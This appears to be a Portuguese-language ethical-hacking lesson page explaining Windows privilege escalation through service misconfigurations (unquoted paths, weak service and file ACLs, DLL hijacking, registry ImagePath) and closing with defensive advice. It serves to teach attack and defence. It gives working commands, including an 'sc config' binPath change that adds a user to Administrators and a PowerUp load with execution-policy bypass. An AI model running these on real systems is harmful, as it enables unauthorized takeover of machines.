Configurações incorretas de serviços
Caminhos sem aspas e permissões fracas
Configurações incorretas de serviços é uma aula grátis de Ethical Hacking Academy no CoddyKit. Esta é a aula 2 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Ethical Hacking Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Ethical Hacking Academy inclui 4 aulas no total.
Serviços como Vetor
Os serviços do Windows geralmente são executados como SYSTEM e iniciam automaticamente. Um serviço configurado incorretamente — com permissões fracas, um caminho de binário que pode ser sequestrado ou um executável com permissão de escrita — permite executar código como SYSTEM.
Caminhos de Serviço sem Aspas
Se o caminho do binário de um serviço contiver espaços e não estiver entre aspas, o Windows tentará cada prefixo delimitado por espaços com .exe. Para C:\Program Files\My App\svc.exe, ele tentará C:\Program.exe, depois C:\Program Files\My.exe e assim por diante.
wmic service get Name,PathName,StartName | findstr /i /v "\""Explorando Caminhos sem Aspas
Se você puder escrever em um desses diretórios intermediários (por exemplo, C:\Program Files\ em um sistema mal configurado), coloque um My.exe malicioso nesse local. Quando o serviço SYSTEM iniciar, o Windows executará seu binário.
icacls "C:\Program Files"
# need write access to the unquoted segmentPermissões Fracas de Serviço
Se seu usuário tiver SERVICE_CHANGE_CONFIG em um serviço SYSTEM, você poderá redirecionar o caminho do binário para sua carga útil e reiniciar o serviço. Verifique as ACLs do serviço com AccessChk.
accesschk.exe -uwcqv "Users" *
# look for SERVICE_ALL_ACCESS / SERVICE_CHANGE_CONFIGModificando o Caminho do Binário do Serviço
Com direitos de configuração, altere binPath para um comando que adicione você ao grupo Administradores e depois reinicie o serviço para que ele seja executado como SYSTEM.
sc config vulnsvc binPath= "cmd /c net localgroup administrators user /add"
sc stop vulnsvc & sc start vulnsvcPermissões Fracas no Arquivo Binário
Mesmo sem direitos de configuração, se o arquivo executável do próprio serviço permitir escrita pelo seu usuário, substitua-o pela sua carga útil e reinicie o serviço (ou aguarde uma reinicialização).
icacls "C:\Program Files\VulnApp\service.exe"
# (M) or (F) for Users/Everyone = writableSequestro de DLL
Se um serviço SYSTEM carregar uma DLL pelo nome a partir de um diretório com permissão de escrita na ordem de pesquisa, coloque uma DLL maliciosa nesse local. O serviço carregará seu código na próxima inicialização. Isso é um sequestro de DLL / abuso da ordem de pesquisa.
Abuso de Serviço Baseado no Registro
A configuração do serviço fica em HKLM\SYSTEM\CurrentControlSet\Services. O acesso de escrita à chave de registro de um serviço permite alterar seu ImagePath — outro caminho para controlar o que é executado como SYSTEM.
reg query "HKLM\SYSTEM\CurrentControlSet\Services\vulnsvc"Reiniciando Serviços
A escalação geralmente depende de acionar uma reinicialização. Se você não puder parar ou iniciar o serviço diretamente, talvez precise reiniciar o sistema — ou direcionar um serviço que reinicie automaticamente. Verifique se sua conta pode reiniciá-lo.
sc qc vulnsvc # query config
sc query vulnsvc # current stateUsando PowerUp para Encontrá-los
As verificações do PowerUp (Get-ServiceUnquoted, Get-ModifiableServiceFile, Get-ModifiableService) automatizam a descoberta de todas essas configurações incorretas de serviços e até geram comandos de exploração.
powershell -ep bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecksDefesas e Ética
As pessoas responsáveis pela defesa devem colocar entre aspas todos os caminhos de serviço, restringir as ACLs dos serviços e binários, executar os serviços com o mínimo de privilégios e proteger as chaves de registro dos serviços. Explore essas falhas somente em sistemas autorizados.
Verificação Rápida
Teste seus conhecimentos sobre configurações incorretas de serviços.
Recapitulação
Você aprendeu sobre escalação baseada em serviços:
- Caminhos de serviço sem aspas permitem colocar um binário em um segmento anterior do caminho
- Permissões fracas de serviço permitem redirecionar
binPath - Binários de serviço com permissão de escrita e o sequestro de DLL também funcionam
- O PowerUp automatiza a descoberta e a exploração
A seguir: representação de tokens.
Perguntas Frequentes
A aula “Configurações incorretas de serviços” é grátis?
Sim — o texto completo de “Configurações incorretas de serviços” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Ethical Hacking Academy, atualize para CoddyKit PRO. O curso de Ethical Hacking Academy inclui 4 aulas no total.
O que vou aprender em “Configurações incorretas de serviços”?
Caminhos sem aspas e permissões fracas Você pratica Ethical Hacking Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.
Preciso ter experiência prévia para começar Ethical Hacking Academy?
Nenhuma experiência prévia é necessária. Ethical Hacking Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 2 de 4.
Quanto tempo leva a aula “Configurações incorretas de serviços”?
A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.
Posso escrever e executar código nesta aula de Ethical Hacking Academy?
Sim. Cada aula de Ethical Hacking Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.
Todas as aulas deste curso
- Enumeração do Windows
- Configurações incorretas de serviços
- Personificação de tokens
- Coleta de credenciais